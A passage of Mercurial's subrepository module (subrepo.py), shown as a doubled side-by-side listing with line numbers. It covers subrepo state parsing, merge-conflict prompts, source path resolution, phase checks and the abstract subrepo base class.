46 def _expandedabspath(path):
46 def _expandedabspath(path):
47 '''
47 '''
48 get a path or url and if it is a path expand it and return an absolute path
48 get a path or url and if it is a path expand it and return an absolute path
49 '''
49 '''
50 expandedpath = util.urllocalpath(util.expandpath(path))
50 expandedpath = util.urllocalpath(util.expandpath(path))
51 u = util.url(expandedpath)
51 u = util.url(expandedpath)
52 if not u.scheme:
52 if not u.scheme:
53 path = util.normpath(os.path.abspath(u.path))
53 path = util.normpath(os.path.abspath(u.path))
54 return path
54 return path
55
55
56 def _getstorehashcachename(remotepath):
56 def _getstorehashcachename(remotepath):
57 '''get a unique filename for the store hash cache of a remote repository'''
57 '''get a unique filename for the store hash cache of a remote repository'''
58 return hashlib.sha1(_expandedabspath(remotepath)).hexdigest()[0:12]
58 return hashlib.sha1(_expandedabspath(remotepath)).hexdigest()[0:12]
59
59
60 class SubrepoAbort(error.Abort):
60 class SubrepoAbort(error.Abort):
61 """Exception class used to avoid handling a subrepo error more than once"""
61 """Exception class used to avoid handling a subrepo error more than once"""
62 def __init__(self, *args, **kw):
62 def __init__(self, *args, **kw):
63 self.subrepo = kw.pop('subrepo', None)
63 self.subrepo = kw.pop('subrepo', None)
64 self.cause = kw.pop('cause', None)
64 self.cause = kw.pop('cause', None)
65 error.Abort.__init__(self, *args, **kw)
65 error.Abort.__init__(self, *args, **kw)
66
66
67 def annotatesubrepoerror(func):
67 def annotatesubrepoerror(func):
68 def decoratedmethod(self, *args, **kargs):
68 def decoratedmethod(self, *args, **kargs):
69 try:
69 try:
70 res = func(self, *args, **kargs)
70 res = func(self, *args, **kargs)
71 except SubrepoAbort as ex:
71 except SubrepoAbort as ex:
72 # This exception has already been handled
72 # This exception has already been handled
73 raise ex
73 raise ex
74 except error.Abort as ex:
74 except error.Abort as ex:
75 subrepo = subrelpath(self)
75 subrepo = subrelpath(self)
76 errormsg = str(ex) + ' ' + _('(in subrepository "%s")') % subrepo
76 errormsg = str(ex) + ' ' + _('(in subrepository "%s")') % subrepo
77 # avoid handling this exception by raising a SubrepoAbort exception
77 # avoid handling this exception by raising a SubrepoAbort exception
78 raise SubrepoAbort(errormsg, hint=ex.hint, subrepo=subrepo,
78 raise SubrepoAbort(errormsg, hint=ex.hint, subrepo=subrepo,
79 cause=sys.exc_info())
79 cause=sys.exc_info())
80 return res
80 return res
81 return decoratedmethod
81 return decoratedmethod
82
82
83 def state(ctx, ui):
83 def state(ctx, ui):
84 """return a state dict, mapping subrepo paths configured in .hgsub
84 """return a state dict, mapping subrepo paths configured in .hgsub
85 to tuple: (source from .hgsub, revision from .hgsubstate, kind
85 to tuple: (source from .hgsub, revision from .hgsubstate, kind
86 (key in types dict))
86 (key in types dict))
87 """
87 """
88 p = config.config()
88 p = config.config()
89 repo = ctx.repo()
89 repo = ctx.repo()
90 def read(f, sections=None, remap=None):
90 def read(f, sections=None, remap=None):
91 if f in ctx:
91 if f in ctx:
92 try:
92 try:
93 data = ctx[f].data()
93 data = ctx[f].data()
94 except IOError as err:
94 except IOError as err:
95 if err.errno != errno.ENOENT:
95 if err.errno != errno.ENOENT:
96 raise
96 raise
97 # handle missing subrepo spec files as removed
97 # handle missing subrepo spec files as removed
98 ui.warn(_("warning: subrepo spec file \'%s\' not found\n") %
98 ui.warn(_("warning: subrepo spec file \'%s\' not found\n") %
99 repo.pathto(f))
99 repo.pathto(f))
100 return
100 return
101 p.parse(f, data, sections, remap, read)
101 p.parse(f, data, sections, remap, read)
102 else:
102 else:
103 raise error.Abort(_("subrepo spec file \'%s\' not found") %
103 raise error.Abort(_("subrepo spec file \'%s\' not found") %
104 repo.pathto(f))
104 repo.pathto(f))
105 if '.hgsub' in ctx:
105 if '.hgsub' in ctx:
106 read('.hgsub')
106 read('.hgsub')
107
107
108 for path, src in ui.configitems('subpaths'):
108 for path, src in ui.configitems('subpaths'):
109 p.set('subpaths', path, src, ui.configsource('subpaths', path))
109 p.set('subpaths', path, src, ui.configsource('subpaths', path))
110
110
111 rev = {}
111 rev = {}
112 if '.hgsubstate' in ctx:
112 if '.hgsubstate' in ctx:
113 try:
113 try:
114 for i, l in enumerate(ctx['.hgsubstate'].data().splitlines()):
114 for i, l in enumerate(ctx['.hgsubstate'].data().splitlines()):
115 l = l.lstrip()
115 l = l.lstrip()
116 if not l:
116 if not l:
117 continue
117 continue
118 try:
118 try:
119 revision, path = l.split(" ", 1)
119 revision, path = l.split(" ", 1)
120 except ValueError:
120 except ValueError:
121 raise error.Abort(_("invalid subrepository revision "
121 raise error.Abort(_("invalid subrepository revision "
122 "specifier in \'%s\' line %d")
122 "specifier in \'%s\' line %d")
123 % (repo.pathto('.hgsubstate'), (i + 1)))
123 % (repo.pathto('.hgsubstate'), (i + 1)))
124 rev[path] = revision
124 rev[path] = revision
125 except IOError as err:
125 except IOError as err:
126 if err.errno != errno.ENOENT:
126 if err.errno != errno.ENOENT:
127 raise
127 raise
128
128
129 def remap(src):
129 def remap(src):
130 for pattern, repl in p.items('subpaths'):
130 for pattern, repl in p.items('subpaths'):
131 # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub
131 # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub
132 # does a string decode.
132 # does a string decode.
133 repl = util.escapestr(repl)
133 repl = util.escapestr(repl)
134 # However, we still want to allow back references to go
134 # However, we still want to allow back references to go
135 # through unharmed, so we turn r'\\1' into r'\1'. Again,
135 # through unharmed, so we turn r'\\1' into r'\1'. Again,
136 # extra escapes are needed because re.sub string decodes.
136 # extra escapes are needed because re.sub string decodes.
137 repl = re.sub(r'\\\\([0-9]+)', r'\\\1', repl)
137 repl = re.sub(r'\\\\([0-9]+)', r'\\\1', repl)
138 try:
138 try:
139 src = re.sub(pattern, repl, src, 1)
139 src = re.sub(pattern, repl, src, 1)
140 except re.error as e:
140 except re.error as e:
141 raise error.Abort(_("bad subrepository pattern in %s: %s")
141 raise error.Abort(_("bad subrepository pattern in %s: %s")
142 % (p.source('subpaths', pattern), e))
142 % (p.source('subpaths', pattern), e))
143 return src
143 return src
144
144
145 state = {}
145 state = {}
146 for path, src in p[''].items():
146 for path, src in p[''].items():
147 kind = 'hg'
147 kind = 'hg'
148 if src.startswith('['):
148 if src.startswith('['):
149 if ']' not in src:
149 if ']' not in src:
150 raise error.Abort(_('missing ] in subrepository source'))
150 raise error.Abort(_('missing ] in subrepository source'))
151 kind, src = src.split(']', 1)
151 kind, src = src.split(']', 1)
152 kind = kind[1:]
152 kind = kind[1:]
153 src = src.lstrip() # strip any extra whitespace after ']'
153 src = src.lstrip() # strip any extra whitespace after ']'
154
154
155 if not util.url(src).isabs():
155 if not util.url(src).isabs():
156 parent = _abssource(repo, abort=False)
156 parent = _abssource(repo, abort=False)
157 if parent:
157 if parent:
158 parent = util.url(parent)
158 parent = util.url(parent)
159 parent.path = posixpath.join(parent.path or '', src)
159 parent.path = posixpath.join(parent.path or '', src)
160 parent.path = posixpath.normpath(parent.path)
160 parent.path = posixpath.normpath(parent.path)
161 joined = str(parent)
161 joined = str(parent)
162 # Remap the full joined path and use it if it changes,
162 # Remap the full joined path and use it if it changes,
163 # else remap the original source.
163 # else remap the original source.
164 remapped = remap(joined)
164 remapped = remap(joined)
165 if remapped == joined:
165 if remapped == joined:
166 src = remap(src)
166 src = remap(src)
167 else:
167 else:
168 src = remapped
168 src = remapped
169
169
170 src = remap(src)
170 src = remap(src)
171 state[util.pconvert(path)] = (src.strip(), rev.get(path, ''), kind)
171 state[util.pconvert(path)] = (src.strip(), rev.get(path, ''), kind)
172
172
173 return state
173 return state
174
174
175 def writestate(repo, state):
175 def writestate(repo, state):
176 """rewrite .hgsubstate in (outer) repo with these subrepo states"""
176 """rewrite .hgsubstate in (outer) repo with these subrepo states"""
177 lines = ['%s %s\n' % (state[s][1], s) for s in sorted(state)
177 lines = ['%s %s\n' % (state[s][1], s) for s in sorted(state)
178 if state[s][1] != nullstate[1]]
178 if state[s][1] != nullstate[1]]
179 repo.wwrite('.hgsubstate', ''.join(lines), '')
179 repo.wwrite('.hgsubstate', ''.join(lines), '')
180
180
181 def submerge(repo, wctx, mctx, actx, overwrite, labels=None):
181 def submerge(repo, wctx, mctx, actx, overwrite, labels=None):
182 """delegated from merge.applyupdates: merging of .hgsubstate file
182 """delegated from merge.applyupdates: merging of .hgsubstate file
183 in working context, merging context and ancestor context"""
183 in working context, merging context and ancestor context"""
184 if mctx == actx: # backwards?
184 if mctx == actx: # backwards?
185 actx = wctx.p1()
185 actx = wctx.p1()
186 s1 = wctx.substate
186 s1 = wctx.substate
187 s2 = mctx.substate
187 s2 = mctx.substate
188 sa = actx.substate
188 sa = actx.substate
189 sm = {}
189 sm = {}
190
190
191 repo.ui.debug("subrepo merge %s %s %s\n" % (wctx, mctx, actx))
191 repo.ui.debug("subrepo merge %s %s %s\n" % (wctx, mctx, actx))
192
192
193 def debug(s, msg, r=""):
193 def debug(s, msg, r=""):
194 if r:
194 if r:
195 r = "%s:%s:%s" % r
195 r = "%s:%s:%s" % r
196 repo.ui.debug(" subrepo %s: %s %s\n" % (s, msg, r))
196 repo.ui.debug(" subrepo %s: %s %s\n" % (s, msg, r))
197
197
198 promptssrc = filemerge.partextras(labels)
198 promptssrc = filemerge.partextras(labels)
199 for s, l in sorted(s1.iteritems()):
199 for s, l in sorted(s1.iteritems()):
200 prompts = None
200 prompts = None
201 a = sa.get(s, nullstate)
201 a = sa.get(s, nullstate)
202 ld = l # local state with possible dirty flag for compares
202 ld = l # local state with possible dirty flag for compares
203 if wctx.sub(s).dirty():
203 if wctx.sub(s).dirty():
204 ld = (l[0], l[1] + "+")
204 ld = (l[0], l[1] + "+")
205 if wctx == actx: # overwrite
205 if wctx == actx: # overwrite
206 a = ld
206 a = ld
207
207
208 prompts = promptssrc.copy()
208 prompts = promptssrc.copy()
209 prompts['s'] = s
209 prompts['s'] = s
210 if s in s2:
210 if s in s2:
211 r = s2[s]
211 r = s2[s]
212 if ld == r or r == a: # no change or local is newer
212 if ld == r or r == a: # no change or local is newer
213 sm[s] = l
213 sm[s] = l
214 continue
214 continue
215 elif ld == a: # other side changed
215 elif ld == a: # other side changed
216 debug(s, "other changed, get", r)
216 debug(s, "other changed, get", r)
217 wctx.sub(s).get(r, overwrite)
217 wctx.sub(s).get(r, overwrite)
218 sm[s] = r
218 sm[s] = r
219 elif ld[0] != r[0]: # sources differ
219 elif ld[0] != r[0]: # sources differ
220 prompts['lo'] = l[0]
220 prompts['lo'] = l[0]
221 prompts['ro'] = r[0]
221 prompts['ro'] = r[0]
222 if repo.ui.promptchoice(
222 if repo.ui.promptchoice(
223 _(' subrepository sources for %(s)s differ\n'
223 _(' subrepository sources for %(s)s differ\n'
224 'use (l)ocal%(l)s source (%(lo)s)'
224 'use (l)ocal%(l)s source (%(lo)s)'
225 ' or (r)emote%(o)s source (%(ro)s)?'
225 ' or (r)emote%(o)s source (%(ro)s)?'
226 '$$ &Local $$ &Remote') % prompts, 0):
226 '$$ &Local $$ &Remote') % prompts, 0):
227 debug(s, "prompt changed, get", r)
227 debug(s, "prompt changed, get", r)
228 wctx.sub(s).get(r, overwrite)
228 wctx.sub(s).get(r, overwrite)
229 sm[s] = r
229 sm[s] = r
230 elif ld[1] == a[1]: # local side is unchanged
230 elif ld[1] == a[1]: # local side is unchanged
231 debug(s, "other side changed, get", r)
231 debug(s, "other side changed, get", r)
232 wctx.sub(s).get(r, overwrite)
232 wctx.sub(s).get(r, overwrite)
233 sm[s] = r
233 sm[s] = r
234 else:
234 else:
235 debug(s, "both sides changed")
235 debug(s, "both sides changed")
236 srepo = wctx.sub(s)
236 srepo = wctx.sub(s)
237 prompts['sl'] = srepo.shortid(l[1])
237 prompts['sl'] = srepo.shortid(l[1])
238 prompts['sr'] = srepo.shortid(r[1])
238 prompts['sr'] = srepo.shortid(r[1])
239 option = repo.ui.promptchoice(
239 option = repo.ui.promptchoice(
240 _(' subrepository %(s)s diverged (local revision: %(sl)s, '
240 _(' subrepository %(s)s diverged (local revision: %(sl)s, '
241 'remote revision: %(sr)s)\n'
241 'remote revision: %(sr)s)\n'
242 '(M)erge, keep (l)ocal%(l)s or keep (r)emote%(o)s?'
242 '(M)erge, keep (l)ocal%(l)s or keep (r)emote%(o)s?'
243 '$$ &Merge $$ &Local $$ &Remote')
243 '$$ &Merge $$ &Local $$ &Remote')
244 % prompts, 0)
244 % prompts, 0)
245 if option == 0:
245 if option == 0:
246 wctx.sub(s).merge(r)
246 wctx.sub(s).merge(r)
247 sm[s] = l
247 sm[s] = l
248 debug(s, "merge with", r)
248 debug(s, "merge with", r)
249 elif option == 1:
249 elif option == 1:
250 sm[s] = l
250 sm[s] = l
251 debug(s, "keep local subrepo revision", l)
251 debug(s, "keep local subrepo revision", l)
252 else:
252 else:
253 wctx.sub(s).get(r, overwrite)
253 wctx.sub(s).get(r, overwrite)
254 sm[s] = r
254 sm[s] = r
255 debug(s, "get remote subrepo revision", r)
255 debug(s, "get remote subrepo revision", r)
256 elif ld == a: # remote removed, local unchanged
256 elif ld == a: # remote removed, local unchanged
257 debug(s, "remote removed, remove")
257 debug(s, "remote removed, remove")
258 wctx.sub(s).remove()
258 wctx.sub(s).remove()
259 elif a == nullstate: # not present in remote or ancestor
259 elif a == nullstate: # not present in remote or ancestor
260 debug(s, "local added, keep")
260 debug(s, "local added, keep")
261 sm[s] = l
261 sm[s] = l
262 continue
262 continue
263 else:
263 else:
264 if repo.ui.promptchoice(
264 if repo.ui.promptchoice(
265 _(' local%(l)s changed subrepository %(s)s'
265 _(' local%(l)s changed subrepository %(s)s'
266 ' which remote%(o)s removed\n'
266 ' which remote%(o)s removed\n'
267 'use (c)hanged version or (d)elete?'
267 'use (c)hanged version or (d)elete?'
268 '$$ &Changed $$ &Delete') % prompts, 0):
268 '$$ &Changed $$ &Delete') % prompts, 0):
269 debug(s, "prompt remove")
269 debug(s, "prompt remove")
270 wctx.sub(s).remove()
270 wctx.sub(s).remove()
271
271
272 for s, r in sorted(s2.items()):
272 for s, r in sorted(s2.items()):
273 prompts = None
273 prompts = None
274 if s in s1:
274 if s in s1:
275 continue
275 continue
276 elif s not in sa:
276 elif s not in sa:
277 debug(s, "remote added, get", r)
277 debug(s, "remote added, get", r)
278 mctx.sub(s).get(r)
278 mctx.sub(s).get(r)
279 sm[s] = r
279 sm[s] = r
280 elif r != sa[s]:
280 elif r != sa[s]:
281 prompts = promptssrc.copy()
281 prompts = promptssrc.copy()
282 prompts['s'] = s
282 prompts['s'] = s
283 if repo.ui.promptchoice(
283 if repo.ui.promptchoice(
284 _(' remote%(o)s changed subrepository %(s)s'
284 _(' remote%(o)s changed subrepository %(s)s'
285 ' which local%(l)s removed\n'
285 ' which local%(l)s removed\n'
286 'use (c)hanged version or (d)elete?'
286 'use (c)hanged version or (d)elete?'
287 '$$ &Changed $$ &Delete') % prompts, 0) == 0:
287 '$$ &Changed $$ &Delete') % prompts, 0) == 0:
288 debug(s, "prompt recreate", r)
288 debug(s, "prompt recreate", r)
289 mctx.sub(s).get(r)
289 mctx.sub(s).get(r)
290 sm[s] = r
290 sm[s] = r
291
291
292 # record merged .hgsubstate
292 # record merged .hgsubstate
293 writestate(repo, sm)
293 writestate(repo, sm)
294 return sm
294 return sm
295
295
296 def _updateprompt(ui, sub, dirty, local, remote):
296 def _updateprompt(ui, sub, dirty, local, remote):
297 if dirty:
297 if dirty:
298 msg = (_(' subrepository sources for %s differ\n'
298 msg = (_(' subrepository sources for %s differ\n'
299 'use (l)ocal source (%s) or (r)emote source (%s)?'
299 'use (l)ocal source (%s) or (r)emote source (%s)?'
300 '$$ &Local $$ &Remote')
300 '$$ &Local $$ &Remote')
301 % (subrelpath(sub), local, remote))
301 % (subrelpath(sub), local, remote))
302 else:
302 else:
303 msg = (_(' subrepository sources for %s differ (in checked out '
303 msg = (_(' subrepository sources for %s differ (in checked out '
304 'version)\n'
304 'version)\n'
305 'use (l)ocal source (%s) or (r)emote source (%s)?'
305 'use (l)ocal source (%s) or (r)emote source (%s)?'
306 '$$ &Local $$ &Remote')
306 '$$ &Local $$ &Remote')
307 % (subrelpath(sub), local, remote))
307 % (subrelpath(sub), local, remote))
308 return ui.promptchoice(msg, 0)
308 return ui.promptchoice(msg, 0)
309
309
310 def reporelpath(repo):
310 def reporelpath(repo):
311 """return path to this (sub)repo as seen from outermost repo"""
311 """return path to this (sub)repo as seen from outermost repo"""
312 parent = repo
312 parent = repo
313 while util.safehasattr(parent, '_subparent'):
313 while util.safehasattr(parent, '_subparent'):
314 parent = parent._subparent
314 parent = parent._subparent
315 return repo.root[len(pathutil.normasprefix(parent.root)):]
315 return repo.root[len(pathutil.normasprefix(parent.root)):]
316
316
317 def subrelpath(sub):
317 def subrelpath(sub):
318 """return path to this subrepo as seen from outermost repo"""
318 """return path to this subrepo as seen from outermost repo"""
319 return sub._relpath
319 return sub._relpath
320
320
321 def _abssource(repo, push=False, abort=True):
321 def _abssource(repo, push=False, abort=True):
322 """return pull/push path of repo - either based on parent repo .hgsub info
322 """return pull/push path of repo - either based on parent repo .hgsub info
323 or on the top repo config. Abort or return None if no source found."""
323 or on the top repo config. Abort or return None if no source found."""
324 if util.safehasattr(repo, '_subparent'):
324 if util.safehasattr(repo, '_subparent'):
325 source = util.url(repo._subsource)
325 source = util.url(repo._subsource)
326 if source.isabs():
326 if source.isabs():
327 return str(source)
327 return str(source)
328 source.path = posixpath.normpath(source.path)
328 source.path = posixpath.normpath(source.path)
329 parent = _abssource(repo._subparent, push, abort=False)
329 parent = _abssource(repo._subparent, push, abort=False)
330 if parent:
330 if parent:
331 parent = util.url(util.pconvert(parent))
331 parent = util.url(util.pconvert(parent))
332 parent.path = posixpath.join(parent.path or '', source.path)
332 parent.path = posixpath.join(parent.path or '', source.path)
333 parent.path = posixpath.normpath(parent.path)
333 parent.path = posixpath.normpath(parent.path)
334 return str(parent)
334 return str(parent)
335 else: # recursion reached top repo
335 else: # recursion reached top repo
336 if util.safehasattr(repo, '_subtoppath'):
336 if util.safehasattr(repo, '_subtoppath'):
337 return repo._subtoppath
337 return repo._subtoppath
338 if push and repo.ui.config('paths', 'default-push'):
338 if push and repo.ui.config('paths', 'default-push'):
339 return repo.ui.config('paths', 'default-push')
339 return repo.ui.config('paths', 'default-push')
340 if repo.ui.config('paths', 'default'):
340 if repo.ui.config('paths', 'default'):
341 return repo.ui.config('paths', 'default')
341 return repo.ui.config('paths', 'default')
342 if repo.shared():
342 if repo.shared():
343 # chop off the .hg component to get the default path form
343 # chop off the .hg component to get the default path form
344 return os.path.dirname(repo.sharedpath)
344 return os.path.dirname(repo.sharedpath)
345 if abort:
345 if abort:
346 raise error.Abort(_("default path for subrepository not found"))
346 raise error.Abort(_("default path for subrepository not found"))
347
347
348 def _sanitize(ui, vfs, ignore):
348 def _sanitize(ui, vfs, ignore):
349 for dirname, dirs, names in vfs.walk():
349 for dirname, dirs, names in vfs.walk():
350 for i, d in enumerate(dirs):
350 for i, d in enumerate(dirs):
351 if d.lower() == ignore:
351 if d.lower() == ignore:
352 del dirs[i]
352 del dirs[i]
353 break
353 break
354 if vfs.basename(dirname).lower() != '.hg':
354 if vfs.basename(dirname).lower() != '.hg':
355 continue
355 continue
356 for f in names:
356 for f in names:
357 if f.lower() == 'hgrc':
357 if f.lower() == 'hgrc':
358 ui.warn(_("warning: removing potentially hostile 'hgrc' "
358 ui.warn(_("warning: removing potentially hostile 'hgrc' "
359 "in '%s'\n") % vfs.join(dirname))
359 "in '%s'\n") % vfs.join(dirname))
360 vfs.unlink(vfs.reljoin(dirname, f))
360 vfs.unlink(vfs.reljoin(dirname, f))
361
361
362 def subrepo(ctx, path, allowwdir=False, allowcreate=True):
362 def subrepo(ctx, path, allowwdir=False, allowcreate=True):
363 """return instance of the right subrepo class for subrepo in path"""
363 """return instance of the right subrepo class for subrepo in path"""
364 # subrepo inherently violates our import layering rules
364 # subrepo inherently violates our import layering rules
365 # because it wants to make repo objects from deep inside the stack
365 # because it wants to make repo objects from deep inside the stack
366 # so we manually delay the circular imports to not break
366 # so we manually delay the circular imports to not break
367 # scripts that don't use our demand-loading
367 # scripts that don't use our demand-loading
368 global hg
368 global hg
369 from . import hg as h
369 from . import hg as h
370 hg = h
370 hg = h
371
371
372 pathutil.pathauditor(ctx.repo().root)(path)
372 pathutil.pathauditor(ctx.repo().root)(path)
373 state = ctx.substate[path]
373 state = ctx.substate[path]
374 if state[2] not in types:
374 if state[2] not in types:
375 raise error.Abort(_('unknown subrepo type %s') % state[2])
375 raise error.Abort(_('unknown subrepo type %s') % state[2])
376 if allowwdir:
376 if allowwdir:
377 state = (state[0], ctx.subrev(path), state[2])
377 state = (state[0], ctx.subrev(path), state[2])
378 return types[state[2]](ctx, path, state[:2], allowcreate)
378 return types[state[2]](ctx, path, state[:2], allowcreate)
379
379
380 def nullsubrepo(ctx, path, pctx):
380 def nullsubrepo(ctx, path, pctx):
381 """return an empty subrepo in pctx for the extant subrepo in ctx"""
381 """return an empty subrepo in pctx for the extant subrepo in ctx"""
382 # subrepo inherently violates our import layering rules
382 # subrepo inherently violates our import layering rules
383 # because it wants to make repo objects from deep inside the stack
383 # because it wants to make repo objects from deep inside the stack
384 # so we manually delay the circular imports to not break
384 # so we manually delay the circular imports to not break
385 # scripts that don't use our demand-loading
385 # scripts that don't use our demand-loading
386 global hg
386 global hg
387 from . import hg as h
387 from . import hg as h
388 hg = h
388 hg = h
389
389
390 pathutil.pathauditor(ctx.repo().root)(path)
390 pathutil.pathauditor(ctx.repo().root)(path)
391 state = ctx.substate[path]
391 state = ctx.substate[path]
392 if state[2] not in types:
392 if state[2] not in types:
393 raise error.Abort(_('unknown subrepo type %s') % state[2])
393 raise error.Abort(_('unknown subrepo type %s') % state[2])
394 subrev = ''
394 subrev = ''
395 if state[2] == 'hg':
395 if state[2] == 'hg':
396 subrev = "0" * 40
396 subrev = "0" * 40
397 return types[state[2]](pctx, path, (state[0], subrev), True)
397 return types[state[2]](pctx, path, (state[0], subrev), True)
398
398
399 def newcommitphase(ui, ctx):
399 def newcommitphase(ui, ctx):
400 commitphase = phases.newcommitphase(ui)
400 commitphase = phases.newcommitphase(ui)
401 substate = getattr(ctx, "substate", None)
401 substate = getattr(ctx, "substate", None)
402 if not substate:
402 if not substate:
403 return commitphase
403 return commitphase
404 check = ui.config('phases', 'checksubrepos')
404 check = ui.config('phases', 'checksubrepos')
405 if check not in ('ignore', 'follow', 'abort'):
405 if check not in ('ignore', 'follow', 'abort'):
406 raise error.Abort(_('invalid phases.checksubrepos configuration: %s')
406 raise error.Abort(_('invalid phases.checksubrepos configuration: %s')
407 % (check))
407 % (check))
408 if check == 'ignore':
408 if check == 'ignore':
409 return commitphase
409 return commitphase
410 maxphase = phases.public
410 maxphase = phases.public
411 maxsub = None
411 maxsub = None
412 for s in sorted(substate):
412 for s in sorted(substate):
413 sub = ctx.sub(s)
413 sub = ctx.sub(s)
414 subphase = sub.phase(substate[s][1])
414 subphase = sub.phase(substate[s][1])
415 if maxphase < subphase:
415 if maxphase < subphase:
416 maxphase = subphase
416 maxphase = subphase
417 maxsub = s
417 maxsub = s
418 if commitphase < maxphase:
418 if commitphase < maxphase:
419 if check == 'abort':
419 if check == 'abort':
420 raise error.Abort(_("can't commit in %s phase"
420 raise error.Abort(_("can't commit in %s phase"
421 " conflicting %s from subrepository %s") %
421 " conflicting %s from subrepository %s") %
422 (phases.phasenames[commitphase],
422 (phases.phasenames[commitphase],
423 phases.phasenames[maxphase], maxsub))
423 phases.phasenames[maxphase], maxsub))
424 ui.warn(_("warning: changes are committed in"
424 ui.warn(_("warning: changes are committed in"
425 " %s phase from subrepository %s\n") %
425 " %s phase from subrepository %s\n") %
426 (phases.phasenames[maxphase], maxsub))
426 (phases.phasenames[maxphase], maxsub))
427 return maxphase
427 return maxphase
428 return commitphase
428 return commitphase
429
429
430 # subrepo classes need to implement the following abstract class:
430 # subrepo classes need to implement the following abstract class:
431
431
432 class abstractsubrepo(object):
432 class abstractsubrepo(object):
433
433
434 def __init__(self, ctx, path):
434 def __init__(self, ctx, path):
435 """Initialize abstractsubrepo part
435 """Initialize abstractsubrepo part
436
436
437 ``ctx`` is the context referring this subrepository in the
437 ``ctx`` is the context referring this subrepository in the
438 parent repository.
438 parent repository.
439
439
440 ``path`` is the path to this subrepository as seen from
440 ``path`` is the path to this subrepository as seen from
441 innermost repository.
441 innermost repository.
442 """
442 """
443 self.ui = ctx.repo().ui
443 self.ui = ctx.repo().ui
444 self._ctx = ctx
444 self._ctx = ctx
445 self._path = path
445 self._path = path
446
446
447 def addwebdirpath(self, serverpath, webconf):
447 def addwebdirpath(self, serverpath, webconf):
448 """Add the hgwebdir entries for this subrepo, and any of its subrepos.
448 """Add the hgwebdir entries for this subrepo, and any of its subrepos.
449
449
450 ``serverpath`` is the path component of the URL for this repo.
450 ``serverpath`` is the path component of the URL for this repo.
451
451
452 ``webconf`` is the dictionary of hgwebdir entries.
452 ``webconf`` is the dictionary of hgwebdir entries.
453 """
453 """
454 pass
454 pass
455
455
456 def storeclean(self, path):
456 def storeclean(self, path):
457 """
457 """
458 returns true if the repository has not changed since it was last
458 returns true if the repository has not changed since it was last
459 cloned from or pushed to a given repository.
459 cloned from or pushed to a given repository.
460 """
460 """
461 return False
461 return False
462
462
463 def dirty(self, ignoreupdate=False, missing=False):
463 def dirty(self, ignoreupdate=False, missing=False):
464 """returns true if the dirstate of the subrepo is dirty or does not
464 """returns true if the dirstate of the subrepo is dirty or does not
465 match current stored state. If ignoreupdate is true, only check
465 match current stored state. If ignoreupdate is true, only check
466 whether the subrepo has uncommitted changes in its dirstate. If missing
466 whether the subrepo has uncommitted changes in its dirstate. If missing
467 is true, check for deleted files.
467 is true, check for deleted files.
468 """
468 """
469 raise NotImplementedError
469 raise NotImplementedError
470
470
471 def dirtyreason(self, ignoreupdate=False, missing=False):
471 def dirtyreason(self, ignoreupdate=False, missing=False):
472 """return reason string if it is ``dirty()``
472 """return reason string if it is ``dirty()``
473
473
474 Returned string should have enough information for the message
474 Returned string should have enough information for the message
475 of exception.
475 of exception.
476
476
477 This returns None, otherwise.
477 This returns None, otherwise.
478 """
478 """
479 if self.dirty(ignoreupdate=ignoreupdate, missing=missing):
479 if self.dirty(ignoreupdate=ignoreupdate, missing=missing):
480 return _('uncommitted changes in subrepository "%s"'
480 return _('uncommitted changes in subrepository "%s"'
481 ) % subrelpath(self)
481 ) % subrelpath(self)
482
482
483 def bailifchanged(self, ignoreupdate=False, hint=None):
483 def bailifchanged(self, ignoreupdate=False, hint=None):
484 """raise Abort if subrepository is ``dirty()``
484 """raise Abort if subrepository is ``dirty()``
485 """
485 """
486 dirtyreason = self.dirtyreason(ignoreupdate=ignoreupdate,
486 dirtyreason = self.dirtyreason(ignoreupdate=ignoreupdate,
487 missing=True)
487 missing=True)
488 if dirtyreason:
488 if dirtyreason:
489 raise error.Abort(dirtyreason, hint=hint)
489 raise error.Abort(dirtyreason, hint=hint)
490
490
491 def basestate(self):
491 def basestate(self):
492 """current working directory base state, disregarding .hgsubstate
492 """current working directory base state, disregarding .hgsubstate
493 state and working directory modifications"""
493 state and working directory modifications"""
494 raise NotImplementedError
494 raise NotImplementedError
495
495
496 def checknested(self, path):
496 def checknested(self, path):
497 """check if path is a subrepository within this repository"""
497 """check if path is a subrepository within this repository"""
498 return False
498 return False
499
499
500 def commit(self, text, user, date):
500 def commit(self, text, user, date):
501 """commit the current changes to the subrepo with the given
501 """commit the current changes to the subrepo with the given
502 log message. Use given user and date if possible. Return the
502 log message. Use given user and date if possible. Return the
503 new state of the subrepo.
503 new state of the subrepo.
504 """
504 """
505 raise NotImplementedError
505 raise NotImplementedError
506
506
507 def phase(self, state):
507 def phase(self, state):
508 """returns phase of specified state in the subrepository.
508 """returns phase of specified state in the subrepository.
509 """
509 """
510 return phases.public
510 return phases.public
511
511
512 def remove(self):
512 def remove(self):
513 """remove the subrepo
513 """remove the subrepo
514
514
515 (should verify the dirstate is not dirty first)
515 (should verify the dirstate is not dirty first)
516 """
516 """
517 raise NotImplementedError
517 raise NotImplementedError
518
518
519 def get(self, state, overwrite=False):
519 def get(self, state, overwrite=False):
520 """run whatever commands are needed to put the subrepo into
520 """run whatever commands are needed to put the subrepo into
521 this state
521 this state
522 """
522 """
523 raise NotImplementedError
523 raise NotImplementedError
524
524
525 def merge(self, state):
525 def merge(self, state):
526 """merge currently-saved state with the new state."""
526 """merge currently-saved state with the new state."""
527 raise NotImplementedError
527 raise NotImplementedError
528
528
529 def push(self, opts):
529 def push(self, opts):
530 """perform whatever action is analogous to 'hg push'
530 """perform whatever action is analogous to 'hg push'
531
531
532 This may be a no-op on some systems.
532 This may be a no-op on some systems.
533 """
533 """
534 raise NotImplementedError
534 raise NotImplementedError
535
535
536 def add(self, ui, match, prefix, explicitonly, **opts):
536 def add(self, ui, match, prefix, explicitonly, **opts):
537 return []
537 return []
538
538
539 def addremove(self, matcher, prefix, opts, dry_run, similarity):
539 def addremove(self, matcher, prefix, opts, dry_run, similarity):
540 self.ui.warn("%s: %s" % (prefix, _("addremove is not supported")))
540 self.ui.warn("%s: %s" % (prefix, _("addremove is not supported")))
541 return 1
541 return 1
542
542
543 def cat(self, match, fm, fntemplate, prefix, **opts):
543 def cat(self, match, fm, fntemplate, prefix, **opts):
544 return 1
544 return 1
545
545
546 def status(self, rev2, **opts):
546 def status(self, rev2, **opts):
547 return scmutil.status([], [], [], [], [], [], [])
547 return scmutil.status([], [], [], [], [], [], [])
548
548
549 def diff(self, ui, diffopts, node2, match, prefix, **opts):
549 def diff(self, ui, diffopts, node2, match, prefix, **opts):
550 pass
550 pass
551
551
552 def outgoing(self, ui, dest, opts):
